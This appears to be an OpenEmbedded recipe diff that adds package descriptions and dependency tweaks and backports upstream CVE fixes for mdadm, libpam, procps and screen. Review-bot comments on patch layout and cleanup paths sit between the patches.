diff --git a/meta/recipes-extended/lzip/lzip_1.21.bb b/meta/recipes-extended/lzip/lzip_1.21.bb
index bb3d2a6fe3..bd1c007de6 100644
--- a/meta/recipes-extended/lzip/lzip_1.21.bb
+++ b/meta/recipes-extended/lzip/lzip_1.21.bb
@@ -1,5 +1,6 @@
SUMMARY = "Lossless data compressor based on the LZMA algorithm"
HOMEPAGE = "http://lzip.nongnu.org/lzip.html"
+DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability."
SECTION = "console/utils"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \
diff --git a/meta/recipes-extended/man-db/man-db_2.9.0.bb b/meta/recipes-extended/man-db/man-db_2.9.0.bb
index 5b017e8023..7a30f9d722 100644
--- a/meta/recipes-extended/man-db/man-db_2.9.0.bb
+++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command"
HOMEPAGE = "http://man-db.nongnu.org/"
+DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases."
LICENSE = "LGPLv2.1 & GPLv2"
LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \
file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a"
@@ -12,6 +13,7 @@ SRC_URI[sha256sum] = "5d4aacd9e8876d6a3203a889860c3524c293c38f04111a3350deab8a6c
DEPENDS = "libpipeline gdbm groff-native base-passwd"
RDEPENDS_${PN} += "base-passwd"
+PACKAGE_WRITE_DEPS += "base-passwd"
# | /usr/src/debug/man-db/2.8.0-r0/man-db-2.8.0/src/whatis.c:939: undefined reference to `_nl_msg_cat_cntr'
USE_NLS_libc-musl = "no"
@@ -21,6 +23,11 @@ inherit gettext pkgconfig autotools systemd
EXTRA_OECONF = "--with-pager=less --with-systemdsystemunitdir=${systemd_unitdir}/system"
EXTRA_AUTORECONF += "-I ${S}/gl/m4"
+# Can be dropped when the output next changes, avoids failures after
+# reproducibility issues
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
do_install() {
autotools_do_install
diff --git a/meta/recipes-extended/mc/mc_4.8.23.bb b/meta/recipes-extended/mc/mc_4.8.23.bb
index ead348b92e..8e3b7a65e0 100644
--- a/meta/recipes-extended/mc/mc_4.8.23.bb
+++ b/meta/recipes-extended/mc/mc_4.8.23.bb
@@ -1,5 +1,6 @@
SUMMARY = "Midnight Commander is an ncurses based file manager"
HOMEPAGE = "http://www.midnight-commander.org/"
+DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included."
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2"
SECTION = "console/utils"
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
new file mode 100644
index 0000000000..8e0a06cbc7
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
@@ -0,0 +1,77 @@
+From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001
+From: Blazej Kucman <blazej.kucman@intel.com>
+Date: Fri, 3 Dec 2021 15:31:15 +0100
+Subject: mdadm: block creation with long names
+
+This fixes buffer overflows in create_mddev(). It prohibits
+creation with not supported names for DDF and native. For IMSM,
+mdadm will do silent cut to 16 later.
+
+Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com>
+Signed-off-by: Blazej Kucman <blazej.kucman@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce]
+CVE: CVE-2023-28736
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ mdadm.8.in | 5 +++++
+ mdadm.c | 9 ++++++++-
+ mdadm.h | 5 +++++
+ 3 files changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/mdadm.8.in b/mdadm.8.in
+index 28d773c2..68e100cb 100644
+--- a/mdadm.8.in
++++ b/mdadm.8.in
+@@ -2186,6 +2186,11 @@ is run, but will be created by
+ .I udev
+ once the array becomes active.
+
++The max length md-device name is limited to 32 characters.
++Different metadata types have more strict limitation
++(like IMSM where only 16 characters are allowed).
++For that reason, long name could be truncated or rejected, it depends on metadata policy.
++
+ As devices are added, they are checked to see if they contain RAID
+ superblocks or filesystems. They are also checked to see if the variance in
+ device size exceeds 1%.
+diff --git a/mdadm.c b/mdadm.c
+index 91e67467..26299b2e 100644
+--- a/mdadm.c
++++ b/mdadm.c
+@@ -1359,9 +1359,16 @@ int main(int argc, char *argv[])
+ mdfd = open_mddev(devlist->devname, 1);
+ if (mdfd < 0)
+ exit(1);
+- } else
++ } else {
++ char *bname = basename(devlist->devname);
++
++ if (strlen(bname) > MD_NAME_MAX) {
++ pr_err("Name %s is too long.\n", devlist->devname);
++ exit(1);
++ }
+ /* non-existent device is OK */
+ mdfd = open_mddev(devlist->devname, 0);
++ }
+ if (mdfd == -2) {
+ pr_err("device %s exists but is not an md array.\n", devlist->devname);
+ exit(1);
+diff --git a/mdadm.h b/mdadm.h
+index 54567396..c7268a71 100644
+--- a/mdadm.h
++++ b/mdadm.h
+@@ -1880,3 +1880,8 @@ enum r0layout {
+ #define INVALID_SECTORS 1
+ /* And another special number needed for --data_offset=variable */
+ #define VARIABLE_OFFSET 3
++
++/**
++ * This is true for native and DDF, IMSM allows 16.
++ */
++#define MD_NAME_MAX 32
+--
+cgit
+
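Review bot: The `Upstream-Status:`, `CVE: CVE-2023-28736` and backporter `Signed-off-by:` lines sit below the `---` separator, where `git am` treats text as discardable notes. A patch refresh through git-based tooling would therefore likely drop the CVE tag, and the fix would stop being recognised as applied. They belong in the message body above `---`, with `CVE: CVE-2023-28736` directly after the upstream `Signed-off-by:` lines, which is the layout CVE-2024-22365.patch in this same change uses. CVE-2023-28938.patch has the same placement problem.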
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
new file mode 100644
index 0000000000..1e2990d79a
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
@@ -0,0 +1,80 @@
+From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001
+From: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Date: Tue, 27 Jul 2021 10:25:18 +0200
+Subject: Fix memory leak after "mdadm --detail"
+
+Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62]
+CVE: CVE-2023-28938
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Detail.c | 20 +++++++++-----------
+ 1 file changed, 9 insertions(+), 11 deletions(-)
+
+diff --git a/Detail.c b/Detail.c
+index ad56344f..d3af0ab5 100644
+--- a/Detail.c
++++ b/Detail.c
+@@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c)
+ int spares = 0;
+ struct stat stb;
+ int failed = 0;
+- struct supertype *st;
++ struct supertype *st = NULL;
+ char *subarray = NULL;
+ int max_disks = MD_SB_DISKS; /* just a default */
+ struct mdinfo *info = NULL;
+- struct mdinfo *sra;
++ struct mdinfo *sra = NULL;
+ struct mdinfo *subdev;
+ char *member = NULL;
+ char *container = NULL;
+@@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c)
+ if (!sra) {
+ if (md_get_array_info(fd, &array)) {
+ pr_err("%s does not appear to be an md device\n", dev);
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+ external = (sra != NULL && sra->array.major_version == -1 &&
+@@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c)
+ sra->devs == NULL) {
+ pr_err("Array associated with md device %s does not exist.\n",
+ dev);
+- close(fd);
+- sysfs_free(sra);
+- return rv;
++ goto out;
+ }
+ array = sra->array;
+ } else {
+ pr_err("cannot get array detail for %s: %s\n",
+ dev, strerror(errno));
+- close(fd);
+- return rv;
++ goto out;
+ }
+ }
+
+@@ -827,10 +823,12 @@ out:
+ close(fd);
+ free(subarray);
+ free(avail);
+- for (d = 0; d < n_devices; d++)
+- free(devices[d]);
++ if (devices)
++ for (d = 0; d < n_devices; d++)
++ free(devices[d]);
+ free(devices);
+ sysfs_free(sra);
++ free(st);
+ return rv;
+ }
+
+--
+cgit
+
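Review bot: The three early exits converted to `goto out` now run the whole cleanup block, so every pointer released there (`subarray`, `avail`, `devices`, `sra`, `st`) must already hold NULL or a valid allocation at the first jump. The hunks show that only for `st`, `sra` and `subarray`. The declarations of `avail`, `devices` and `n_devices` lie outside the visible context and should be checked against the 4.1 sources this is applied to, since an uninitialised `avail` would be handed to `free()`. Also, `free(st)` releases only the `struct supertype` itself; whether its superblock buffer is released earlier in `Detail()` is not visible here.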
diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb
index 001d3331a7..ca326fd1cb 100644
--- a/meta/recipes-extended/mdadm/mdadm_4.1.bb
+++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tool for managing software RAID under Linux"
HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/"
+DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices."
# Some files are GPLv2+ while others are GPLv2.
LICENSE = "GPLv2 & GPLv2+"
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \
file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \
file://include_sysmacros.patch \
file://0001-mdadm-skip-test-11spare-migration.patch \
+ file://CVE-2023-28736.patch \
+ file://CVE-2023-28938.patch \
"
SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598"
diff --git a/meta/recipes-extended/mingetty/mingetty_1.08.bb b/meta/recipes-extended/mingetty/mingetty_1.08.bb
index 491b892093..9822e86b0e 100644
--- a/meta/recipes-extended/mingetty/mingetty_1.08.bb
+++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb
@@ -1,6 +1,7 @@
SUMMARY = "Compact getty terminal handler for virtual consoles only"
SECTION = "console/utils"
HOMEPAGE = "http://sourceforge.net/projects/mingetty/"
+DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app."
LICENSE = "GPLv2"
PR = "r3"
diff --git a/meta/recipes-extended/minicom/minicom_2.7.1.bb b/meta/recipes-extended/minicom/minicom_2.7.1.bb
index 6c539c553b..79d06d20f9 100644
--- a/meta/recipes-extended/minicom/minicom_2.7.1.bb
+++ b/meta/recipes-extended/minicom/minicom_2.7.1.bb
@@ -26,3 +26,5 @@ do_install() {
}
RRECOMMENDS_${PN} += "lrzsz"
+
+RDEPENDS_${PN} += "ncurses-terminfo-base"
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb
index 88b4cf4a03..3d35a17c92 100644
--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
S = "${WORKDIR}/newt-${PV}"
-inherit autotools-brokensep python3native python3-dir
+inherit autotools-brokensep python3native python3-dir python3targetconfig
EXTRA_OECONF = "--without-tcl --with-python"
diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
new file mode 100644
index 0000000000..33ac37b7f0
--- /dev/null
+++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch
@@ -0,0 +1,59 @@
+From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <matthias.gerstner@suse.de>
+Date: Wed, 27 Dec 2023 14:01:59 +0100
+Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent
+ local DoS situations
+
+Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs
+being placed in user controlled directories, causing the PAM module to
+block indefinitely during `openat()`.
+
+Pass O_DIRECTORY to cause the `openat()` to fail if the path does not
+refer to a directory.
+
+With this the check whether the final path element is a directory
+becomes unnecessary, drop it.
+
+Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb]
+CVE: CVE-2024-22365
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ modules/pam_namespace/pam_namespace.c | 18 +-----------------
+ 1 file changed, 1 insertion(+), 17 deletions(-)
+
+diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c
+index 2528cff86..f72d67189 100644
+--- a/modules/pam_namespace/pam_namespace.c
++++ b/modules/pam_namespace/pam_namespace.c
+@@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ int dfd = AT_FDCWD;
+ int dfd_next;
+ int save_errno;
+- int flags = O_RDONLY;
++ int flags = O_RDONLY | O_DIRECTORY;
+ int rv = -1;
+ struct stat st;
+
+@@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir,
+ rv = openat(dfd, dir, flags);
+ }
+
+- if (rv != -1) {
+- if (fstat(rv, &st) != 0) {
+- save_errno = errno;
+- close(rv);
+- rv = -1;
+- errno = save_errno;
+- goto error;
+- }
+- if (!S_ISDIR(st.st_mode)) {
+- close(rv);
+- errno = ENOTDIR;
+- rv = -1;
+- goto error;
+- }
+- }
+-
+ if (flags & O_NOFOLLOW) {
+ /* we are inside user-owned dir - protect */
+ if (protect_mount(rv, p, idata) == -1) {
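Review bot: With the `fstat()`/`S_ISDIR` block removed, the only thing that keeps `protect_dir()` from opening a FIFO or other non-directory is the `O_DIRECTORY` bit in `flags`, and nothing at that line says so. A comment such as `/* O_DIRECTORY: openat() must fail, not block, on a FIFO planted in a user-controlled directory */` on the `int flags = O_RDONLY | O_DIRECTORY;` line would stop a later cleanup from dropping the flag. The context line `struct stat st;` is kept although its visible user is gone. If nothing else in the function, which extends beyond this hunk, reads it, the declaration can go too.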
diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb
index bc72afe6ad..527a368e2d 100644
--- a/meta/recipes-extended/pam/libpam_1.3.1.bb
+++ b/meta/recipes-extended/pam/libpam_1.3.1.bb
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux
file://pam-security-abstract-securetty-handling.patch \
file://pam-unix-nullok-secure.patch \
file://crypt_configure.patch \
+ file://CVE-2024-22365.patch \
"
SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165"
diff --git a/meta/recipes-extended/parted/parted_3.3.bb b/meta/recipes-extended/parted/parted_3.3.bb
index 1cfd9ec264..2d688c3700 100644
--- a/meta/recipes-extended/parted/parted_3.3.bb
+++ b/meta/recipes-extended/parted/parted_3.3.bb
@@ -1,5 +1,6 @@
SUMMARY = "Disk partition editing/resizing utility"
HOMEPAGE = "http://www.gnu.org/software/parted/parted.html"
+DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c"
SECTION = "console/tools"
@@ -22,7 +23,7 @@ EXTRA_OECONF = "--disable-device-mapper"
inherit autotools pkgconfig gettext texinfo ptest
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
do_compile_ptest() {
oe_runmake -C tests print-align print-max dup-clobber duplicate fs-resize print-flags
diff --git a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
index 9f992d3e83..409a8f3896 100644
--- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
+++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
@@ -1,5 +1,7 @@
SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library"
SECTION = "libs"
+HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27"
+DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions."
LICENSE = "Artistic-1.0 | GPL-1.0+"
LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f"
diff --git a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
index 7219c7d11e..068f0bd3f3 100644
--- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
+++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
@@ -1,5 +1,6 @@
SUMMARY = "Perl modules useful for manipulating date and time information"
HOMEPAGE = "https://metacpan.org/release/TimeDate"
+DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later."
SECTION = "libs"
# You can redistribute it and/or modify it under the same terms as Perl itself.
LICENSE = "Artistic-1.0 | GPL-1.0+"
diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
new file mode 100644
index 0000000000..50582a8649
--- /dev/null
+++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch
@@ -0,0 +1,85 @@
+From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001
+From: Craig Small <csmall@dropbear.xyz>
+Date: Thu, 10 Aug 2023 21:18:38 +1000
+Subject: [PATCH] ps: Fix possible buffer overflow in -C option
+
+ps allocates memory using malloc(length of arg * len of struct).
+In certain strange circumstances, the arg length could be very large
+and the multiplecation will overflow, allocating a small amount of
+memory.
+
+Subsequent strncpy() will then write into unallocated memory.
+The fix is to use calloc. It's slower but this is a one-time
+allocation. Other malloc(x * y) calls have also been replaced
+by calloc(x, y)
+
+References:
+ https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016
+ https://nvd.nist.gov/vuln/detail/CVE-2023-4016
+ https://gitlab.com/procps-ng/procps/-/issues/297
+ https://bugs.debian.org/1042887
+
+Signed-off-by: Craig Small <csmall@dropbear.xyz>
+
+CVE: CVE-2023-4016
+Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ NEWS | 1 +
+ ps/parser.c | 8 ++++----
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/NEWS b/NEWS
+index b9509734..64fa3da8 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,3 +1,5 @@
++ * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297
++
+ procps-ng-3.3.16
+ ----------------
+ * library: Increment to 8:2:0
+diff --git a/ps/parser.c b/ps/parser.c
+index 248aa741..15873dfa 100644
+--- a/ps/parser.c
++++ b/ps/parser.c
+@@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ const char *err; /* error code that could or did happen */
+ /*** prepare to operate ***/
+ node = malloc(sizeof(selection_node));
+- node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */
+ node->n = 0;
+ buf = strdup(arg);
+ /*** sanity check and count items ***/
+@@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s
+ } while (*++walk);
+ if(need_item) goto parse_error;
+ node->n = items;
++ node->u = calloc(items, sizeof(sel_union));
+ /*** actually parse the list ***/
+ walk = buf;
+ while(items--){
+@@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){
+ thisarg = ps_argc - 1; /* we must be at the end now */
+
+ pidnode = malloc(sizeof(selection_node));
+- pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ pidnode->n = 0;
+
+ grpnode = malloc(sizeof(selection_node));
+- grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */
+ grpnode->n = 0;
+
+ sidnode = malloc(sizeof(selection_node));
+- sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */
++ sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */
+ sidnode->n = 0;
+
+ while(i--){
+--
+GitLab
+
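Review bot: In `parse_list()` the allocation of `node->u` moves below the item-counting loop, but `node` comes from `malloc()` and nothing sets `node->u` before the `goto parse_error` that precedes the new `calloc()`. The `parse_error` label is outside this hunk; if it releases `node->u`, as cleanup for this node normally would, it now frees an indeterminate pointer for a malformed list argument. Initialising it next to the existing reset, `node->u = NULL;` after `node->n = 0;`, closes that path. The `calloc()` results are also used unchecked, so an overflowing count becomes a NULL dereference rather than a clean error return.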
diff --git a/meta/recipes-extended/procps/procps_3.3.16.bb b/meta/recipes-extended/procps/procps_3.3.16.bb
index 2810ebd285..ac27734a6f 100644
--- a/meta/recipes-extended/procps/procps_3.3.16.bb
+++ b/meta/recipes-extended/procps/procps_3.3.16.bb
@@ -12,8 +12,9 @@ DEPENDS = "ncurses"
inherit autotools gettext pkgconfig update-alternatives
-SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \
+SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
file://sysctl.conf \
+ file://CVE-2023-4016.patch \
"
SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f"
diff --git a/meta/recipes-extended/psmisc/psmisc_23.3.bb b/meta/recipes-extended/psmisc/psmisc_23.3.bb
index e569f1074b..36e6775f9e 100644
--- a/meta/recipes-extended/psmisc/psmisc_23.3.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb
@@ -2,7 +2,7 @@ require psmisc.inc
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
-SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \
+SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
"
SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772"
diff --git a/meta/recipes-extended/quota/quota_4.05.bb b/meta/recipes-extended/quota/quota_4.05.bb
index c5da1e71ed..46ad7352d6 100644
--- a/meta/recipes-extended/quota/quota_4.05.bb
+++ b/meta/recipes-extended/quota/quota_4.05.bb
@@ -1,6 +1,7 @@
SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem"
SECTION = "base"
HOMEPAGE = "http://sourceforge.net/projects/linuxquota/"
+DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel"
BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136"
LICENSE = "BSD & GPLv2+ & LGPLv2.1+"
LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \
diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
index cb5b288c48..0f8a6f74f8 100644
--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}"
SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c"
-SRC_URI = "git://github.com/thkukuk/${BPN} \
+SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
file://0001-Use-cross-compiled-rpcgen.patch \
"
diff --git a/meta/recipes-extended/screen/screen/CVE-2021-26937.patch b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
new file mode 100644
index 0000000000..983b35c1b0
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch
@@ -0,0 +1,68 @@
+Description: [CVE-2021-26937] Fix out of bounds array access
+Author: Michael Schröder <mls@suse.de>
+Bug-Debian: https://bugs.debian.org/982435
+Bug: https://savannah.gnu.org/bugs/?60030
+Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
+Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3
+Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html
+
+CVE: CVE-2021-26937
+Upstream-Status: Pending
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+--- a/encoding.c
++++ b/encoding.c
+@@ -43,7 +43,7 @@
+ # ifdef UTF8
+ static int recode_char __P((int, int, int));
+ static int recode_char_to_encoding __P((int, int));
+-static void comb_tofront __P((int, int));
++static void comb_tofront __P((int));
+ # ifdef DW_CHARS
+ static int recode_char_dw __P((int, int *, int, int));
+ static int recode_char_dw_to_encoding __P((int, int *, int));
+@@ -1263,6 +1263,8 @@
+ {0x30000, 0x3FFFD},
+ };
+
++ if (c >= 0xdf00 && c <= 0xdfff)
++ return 1; /* dw combining sequence */
+ return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) ||
+ (cjkwidth &&
+ bisearch(c, ambiguous,
+@@ -1330,11 +1332,12 @@
+ }
+
+ static void
+-comb_tofront(root, i)
+-int root, i;
++comb_tofront(i)
++int i;
+ {
+ for (;;)
+ {
++ int root = i >= 0x700 ? 0x801 : 0x800;
+ debug1("bring to front: %x\n", i);
+ combchars[combchars[i]->prev]->next = combchars[i]->next;
+ combchars[combchars[i]->next]->prev = combchars[i]->prev;
+@@ -1396,9 +1399,9 @@
+ {
+ /* full, recycle old entry */
+ if (c1 >= 0xd800 && c1 < 0xe000)
+- comb_tofront(root, c1 - 0xd800);
++ comb_tofront(c1 - 0xd800);
+ i = combchars[root]->prev;
+- if (c1 == i + 0xd800)
++ if (i == 0x800 || i == 0x801 || c1 == i + 0xd800)
+ {
+ /* completely full, can't recycle */
+ debug("utf8_handle_comp: completely full!\n");
+@@ -1422,7 +1425,7 @@
+ mc->font = (i >> 8) + 0xd8;
+ mc->fontx = 0;
+ debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800);
+- comb_tofront(root, i);
++ comb_tofront(i);
+ }
+
+ #else /* !UTF8 */
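Review bot: The constants in `int root = i >= 0x700 ? 0x801 : 0x800;` carry the whole fix and are unexplained. As far as the hunk shows, 0x700 is `0xdf00 - 0xd800`, the start of what the added width check calls the "dw combining sequence" range, and 0x800/0x801 are the two list-head slots tested in the "completely full" branch. A comment on that line, for example `/* slots >= 0x700 are double-width sequences and use list head 0x801, all others 0x800 */`, would let the bounds be audited without re-deriving them. Since the caller's `root` argument is gone, `comb_tofront()` now depends on this split matching the one used by its caller, whose start is outside the hunk.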
diff --git a/meta/recipes-extended/screen/screen/CVE-2023-24626.patch b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
new file mode 100644
index 0000000000..73caf9d81b
--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
@@ -0,0 +1,40 @@
+From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001
+From: Alexander Naumov <alexander_naumov@opensuse.org>
+Date: Mon, 30 Jan 2023 17:22:25 +0200
+Subject: fix: missing signal sending permission check on failed query messages
+
+Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org>
+
+CVE: CVE-2023-24626
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ socket.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/socket.c b/socket.c
+index bb68b35..9d87445 100644
+--- a/socket.c
++++ b/socket.c
+@@ -1285,11 +1285,16 @@ ReceiveMsg()
+ else
+ queryflag = -1;
+
+- Kill(m.m.command.apid,
++ if (CheckPid(m.m.command.apid)) {
++ Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid);
++ }
++ else {
++ Kill(m.m.command.apid,
+ (queryflag >= 0)
+ ? SIGCONT
+ : SIG_BYE); /* Send SIG_BYE if an error happened */
+- queryflag = -1;
++ queryflag = -1;
++ }
+ }
+ break;
+ case MSG_COMMAND:
+--
+2.25.1
+
